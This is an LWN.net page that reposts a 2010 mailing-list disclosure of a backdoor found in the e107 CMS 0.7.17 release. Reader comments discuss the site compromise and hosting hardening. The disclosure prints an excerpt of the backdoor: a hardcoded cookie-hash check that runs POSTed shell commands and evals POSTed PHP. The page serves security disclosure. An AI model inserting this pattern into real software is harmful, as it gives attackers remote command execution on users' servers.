<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
        "http://www.w3.org/TR/html4/loose.dtd">
        <html lang="en">
        <head><title>Backdoor in e107 CMS version 0.7.17 [LWN.net]</title>
        <meta name="twitter:card" content="summary" />
<meta name="twitter:site" content="@lwnnet" />
<meta name="twitter:title" content="Backdoor in e107 CMS version 0.7.17" />
<meta name="twitter:description" content="Bogdan Calin has reported an obvious backdoor in the e107 content management system (CMS) version 0.7.17.  The e107 developers have pulled the offending release and issued an update for anyone that is running the code.  In addition, they have enabled an update notification feature in the administrative interface for future problems.  Click below for the report to the Bugtraq mailing list.
" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
        <link rel="icon" href="https://static.lwn.net/images/favicon.png"
              type="image/png">
        <link rel="alternate" type="application/rss+xml" title="LWN.net headlines" href="https://lwn.net/headlines/newrss">
<link rel="alternate" type="application/rss+xml" title="Comments posted to this article" href="https://lwn.net/headlines/371110/">
        <link rel="stylesheet" href="/CSS/lwn">
<link rel="stylesheet" href="/CSS/nosub">
<link rel="stylesheet" href="/CSS/pure-min">
           <!--[if lte IE 8]>
             <link rel="stylesheet" href="/CSS/grids-responsive-old-ie-min">
           <![endif]-->
           <!--[if gt IE 8]><!-->
             <link rel="stylesheet" href="/CSS/grids-responsive-min">
           <!--<![endif]-->
           <link rel="stylesheet" href="/CSS/pure-lwn">
           
        
<script type="text/javascript">var p="http",d="static";if(document.location.protocol=="https:"){p+="s";d="engine";}var z=document.createElement("script");z.type="text/javascript";z.async=true;z.src=p+"://"+d+".adzerk.net/ados.js";var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(z,s);</script>
<script type="text/javascript">
var ados_keywords = ados_keywords || [];
if( location.protocol=='https:' ) {
        ados_keywords.push('T:SSL');
} else {
        ados_keywords.push('T:HTTP');
}

var ados = ados || {};
ados.run = ados.run || [];
ados.run.push(function() {

ados_add_placement(4669, 20979, "azk13321_leaderboard", 4).setZone(16026);

ados_add_placement(4669, 20979, "azk93271_right_zone", [5,10,6]).setZone(16027);

ados_add_placement(4669, 20979, "azk31017_tracking", 20).setZone(20995);



ados_setKeywords(ados_keywords.join(', ')); 
ados_load();
});</script>

        </head>
        <body bgcolor="#ffffff" link="Blue" VLINK="Green" alink="Green">
        <a name="t"></a>
<div id="menu"><a href="/"><img src="https://static.lwn.net/images/logo/barepenguin-70.png" class="logo"
                 border="0" alt="LWN.net Logo">
           <font class="logo">LWN<br>.net</font>
           <font class="logobl">News from the source</font></a>
           <a href="/"><img src="https://static.lwn.net/images/lcorner-ss.png" class="sslogo"
                 border="0" alt="LWN"></a><div class="navmenu-container">
           <ul class="navmenu">
        <li><a class="navmenu" href="#t"><b>Content</b></a><ul><li><a href="/current/">Weekly Edition</a></li><li><a href="/Archives/">Archives</a></li><li><a href="/Search/">Search</a></li><li><a href="/Kernel/">Kernel</a></li><li><a href="/Security/">Security</a></li><li><a href="/Distributions/">Distributions</a></li><li><a href="/Calendar/">Events calendar</a></li><li><a href="/Comments/unread">Unread comments</a></li><li><hr></li><li><a href="/op/FAQ.lwn">LWN FAQ</a></li><li><a href="/op/AuthorGuide.lwn">Write for us</a></li></ul></li>
<li><a class="navmenu" href="#t"><b>Edition</b></a><ul><li><a href="/Articles/370617/">Return to the Security page</a></li></ul></li>
</ul></div>
</div> <!-- menu -->
<div class="pure-g not-handset" style="margin-left: 10.5em">
           <div class="not-print">
             <div id="azk13321_leaderboard"></div>
           </div>
           </div>
        <div class="topnav-container">
<div class="not-handset"><form action="https://lwn.net/Login/" method="post" name="loginform"
                 class="loginform">
        <label><b>User:</b> <input type="text" name="Username" value="" size="8" id="uc" /></label> 
		<label><b>Password:</b> <input type="password" name="Password" size="8" id="pc" /></label> <input type="hidden" name="target" value="/Articles/371110/" /> <input type="submit" name="submit" value="Log in" /></form> |
           <form action="https://lwn.net/subscribe/" method="post" class="loginform">
           <input type="submit" name="submit" value="Subscribe" />
           </form> |
           <form action="https://lwn.net/Login/newaccount" method="post" class="loginform">
           <input type="submit" name="submit" value="Register" />
           </form>
        </div>
               <div class="handset-only">
               <a href="/subscribe/"><b>Subscribe</b></a> /
               <a href="/Login/"><b>Log in</b></a> /
               <a href="/Login/newaccount"><b>New account</b></a>
               </div>
               </div><div class="pure-grid maincolumn">
<div class="lwn-u-1 pure-u-md-19-24">
<div class="PageHeadline">
<h1>Backdoor in e107 CMS version 0.7.17</h1>
<div class="Byline">[Posted January 25, 2010 by jake]
               <p>
               </div>
</div>
<div class="ArticleText">
<table>
<tr><td valign="top"><b>From</b>:</td>
    	     <td>&nbsp;</td><td valign="top">Bogdan Calin &lt;bogdan-AT-acunetix.com&gt; </td></tr>
<tr><td valign="top"><b>To</b>:</td>
    	     <td>&nbsp;</td><td valign="top">full-disclosure-AT-lists.grok.org.uk </td></tr>
<tr><td valign="top"><b>Subject</b>:</td>
    	     <td>&nbsp;</td><td valign="top">e107 latest download link is backdoored </td></tr>
<tr><td valign="top"><b>Date</b>:</td>
    	     <td>&nbsp;</td><td valign="top">Mon, 25 Jan 2010 12:58:50 +0200</td></tr>
<tr><td valign="top"><b>Message-ID</b>:</td>
    	     <td>&nbsp;</td><td valign="top">&lt;4B5D796A.2020203@acunetix.com&gt;</td></tr>
<tr><td valign="top"><b>Cc</b>:</td>
    	     <td>&nbsp;</td><td valign="top">bugtraq-AT-securityfocus.com</td></tr>
<tr><td valign="top"><b>Archive-link</b>:</td>
    	     <td>&nbsp;</td><td valign="top"><a href="http://mid.gmane.org/4B5D796A.2020203@acunetix.com">Article</a>, <a
                 href="http://news.gmane.org/find-root.php?message_id=4B5D796A.2020203@acunetix.com">Thread</a>
              </td></tr>
</table><p><pre>
Hi guys,

The latest version of e107, version 0.7.17 contains a PHP backdoor.
<a href="http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip">http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip</a>

I've just downloaded this file and while looking through the code, I've
found the following piece of code:

file: class2.php, line: 1876

if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

...

and so on.

I've informed the e107 guys about this situation.
For now, that link is not safe.

Look at the file date, class2.php has been modified on 2010-01-23, 21:52:26

-- 
Bogdan Calin - bogdan@acunetix.com
CTO
Acunetix Ltd. - <a href="http://www.acunetix.com">http://www.acunetix.com</a>
Acunetix Web Security Blog - <a href="http://www.acunetix.com/blog">http://www.acunetix.com/blog</a>


</pre>
<br clear="all"><hr width="60%" align="left">
           (<a href="https://lwn.net/Login/?target=/Articles/371110/">Log in</a> to post comments)
           <p>
           
</div> <!-- ArticleText -->
<p><a name="Comments"></a>

<a name="CommAnchor371133"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 26, 2010 2:34 UTC (Tue) by <b>busterb</b> (subscriber, #560)
       [<a href="/Articles/371133/">Link</a>]
    </p>
    <div class="FormattedComment">
BTW, it also appears that the linked website is covered in cialis link-spam, <br>
probably a result of the backdoor. Proceed with caution.<br>
</div>

  </div>
  
  <div class="CommentReplyButton">
    <form action="/Articles/371133/comment" method="post">
      <input type="submit" value="Reply to this comment">
    </form>
  </div>

  <p>
  
</div>
<div class="Comment">

<a name="CommAnchor371196"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 26, 2010 14:22 UTC (Tue) by <b>cdman</b> (guest, #63220)
       [<a href="/Articles/371196/">Link</a>]
    </p>
    <div class="FormattedComment">
It seems to be fixed now and they also have a notification on their front page about a security update (although they could have used a bigger font :-)). Also, I couldn't find the given piece of code in their CVS repo, which probably means that only their website got hacked, not a dev...<br>
</div>

  </div>
  
  <div class="CommentReplyButton">
    <form action="/Articles/371196/comment" method="post">
      <input type="submit" value="Reply to this comment">
    </form>
  </div>

  <p>
  
</div>
<div class="Comment">

<a name="CommAnchor371200"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 26, 2010 14:31 UTC (Tue) by <b>johill</b> (subscriber, #25196)
       [<a href="/Articles/371200/">Link</a>]
    </p>
    Are you sure? The security update on their page seems to say that 0.7.17 is the <b>solution</b>, while this article says it is the <b>problem</b>.
  </div>
  
  <div class="CommentReplyButton">
    <form action="/Articles/371200/comment" method="post">
      <input type="submit" value="Reply to this comment">
    </form>
  </div>

  <p>
  
</div>
<div class="Comment">

<a name="CommAnchor371404"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 27, 2010 6:43 UTC (Wed) by <b>njs</b> (guest, #40338)
       [<a href="/Articles/371404/">Link</a>]
    </p>
    <div class="FormattedComment">
There's speculation on full-disclosure (click "Thread" above) that that security announcement about 0.7.17 is to fix a *different* hole... and that this other hole was used to compromise e107.org and insert this backdoor into the 0.7.17 "critical security fix, upgrade now if not sooner" release.<br>
</div>

  </div>
  
  <div class="CommentReplyButton">
    <form action="/Articles/371404/comment" method="post">
      <input type="submit" value="Reply to this comment">
    </form>
  </div>

  <p>
  
</div>
<div class="Comment">

<a name="CommAnchor371636"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 28, 2010 10:34 UTC (Thu) by <b>epa</b> (subscriber, #39769)
       [<a href="/Articles/371636/">Link</a>]
    </p>
    <div class="FormattedComment">
Would using a hashing VCS such as Git have prevented this?  If we all became accustomed to instructions such as 'please upgrade to a4732abc41412' rather than 'please download foo-1.2.3.tar.gz', would it become more difficult to insert such backdoors?<br>
</div>

  </div>
  
  <div class="CommentReplyButton">
    <form action="/Articles/371636/comment" method="post">
      <input type="submit" value="Reply to this comment">
    </form>
  </div>

  <p>
  
</div>
<div class="Comment">

<a name="CommAnchor371718"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">Backdoor in e107 CMS version 0.7.17</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 28, 2010 19:26 UTC (Thu) by <b>njs</b> (guest, #40338)
       [<a href="/Articles/371718/">Link</a>]
    </p>
    In principle it could help, but mostly by making it easier to recover after the repository was compromised (which doesn't seem to have happened here in any case). Presumably they would just change the website to say "please upgrade to 1412a4732abc8" or whatever and no-one would notice that either. Signatures could help in principle, but key management and achieving trust is it's own barrel of worms, and these sorts of attacks are surprisingly rare; I'm not sure how much effort it's worth expending to defend against them.
<p>
If you *really* want to compromise the users of some project, it's pretty straightforward -- just come up with a plausible pseudonym, and send some legitimate patches that "accidentally" introduce an old-fashioned security bug. All the crypto in the world won't help with that. There are plenty of people you'd expect to be expending real resources on this, too -- militaries, criminals, heck, security researchers (who build their reputation and consulting business through finding bugs). The only reason I can think of that we haven't caught anyone at it yet is that earnest engineers produce enough security holes that people who depend on security holes mostly don't find it worth the bother trying to add more.

  </div>
  
  <div class="CommentReplyButton">
    <form action="/Articles/371718/comment" method="post">
      <input type="submit" value="Reply to this comment">
    </form>
  </div>

  <p>
  
</div>
</div>
</div>
</div>
</div>
</div>

<a name="CommAnchor371150"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">e107 + mod_php = evil</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 26, 2010 8:36 UTC (Tue) by <b>efexis</b> (guest, #26355)
       [<a href="/Articles/371150/">Link</a>]
    </p>
    <div class="FormattedComment">
Wow. Thanks guys. I've had SO much trouble thanks to that e107 software on a server I semi-manage where e107 was compromised and, with php running as a module within apache, with that single apache user for all virtual hosts, they pulled site config files w/mysql passwords off every other php based site, then all the user accounts details from all those databases, and some stuff even more serious (it was all very nicely logged! That &amp;cmd=xxx ended up in the apache logs as nearly all requests were GETs).<br>
<p>
It's such a disastrously insecure setup, yet very common, I'm completely amazed by it. Anyone running php virtual hosts out there, I highly recommend mod_fcgid, a rewrite of the earlier fastcgi that runs well and stable and talks to php instances that run under their own UIDs through pipes. In most cases it shouldn't need changes to existing php code, but in some cases it can do, however it's so worth it, php should not be run any other way*.<br>
<p>
(*or at all, there's -everything else- out there that's better!)<br>
<p>
</div>

  </div>
  
  <div class="CommentReplyButton">
    <form action="/Articles/371150/comment" method="post">
      <input type="submit" value="Reply to this comment">
    </form>
  </div>

  <p>
  
</div>
<div class="Comment">

<a name="CommAnchor371199"></a>
<div class="CommentBox">
  <h3 class="CommentTitle">e107 + mod_php = evil</h3>
  <div class="CommentBody">
    <p class="CommentPoster">Posted Jan 26, 2010 14:28 UTC (Tue) by <b>cortana</b> (guest, #24596)
       [<a href="/Articles/371199/">Link</a>]
    </p>
    <div class="FormattedComment">
Huge AOL on mod_fcgid. I can't understand why it's not used _everywhere_.<br>
<p>
I hope it makes it into apache httpd proper some day!<br>
</div>

  </div>
  
  <div class="CommentReplyButton">
    <form action="/Articles/371199/comment" method="post">
      <input type="submit" value="Reply to this comment">
    </form>
  </div>

  <p>
  
</div>
</div>
</div>
<div class="lwn-u-1 pure-u-md-1-6 not-print">
<div id="azk93271_right_zone"></div>
</div>
</div> <!-- pure-grid -->

        <br clear="all">
        <center>
        <P>
        <font size="-2">
        Copyright &copy; 2010, Eklektix, Inc.<BR>
        
        Comments and public postings are copyrighted by their creators.<br>
        Linux  is a registered trademark of Linus Torvalds<br>
        </font>
        </center>
        
            <script type="text/javascript">
            var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
            document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
            </script>
            <script type="text/javascript">
            try {
            var pageTracker = _gat._getTracker("UA-2039382-1");
            pageTracker._trackPageview();
            } catch(err) {}</script>
            
        </body></html>
        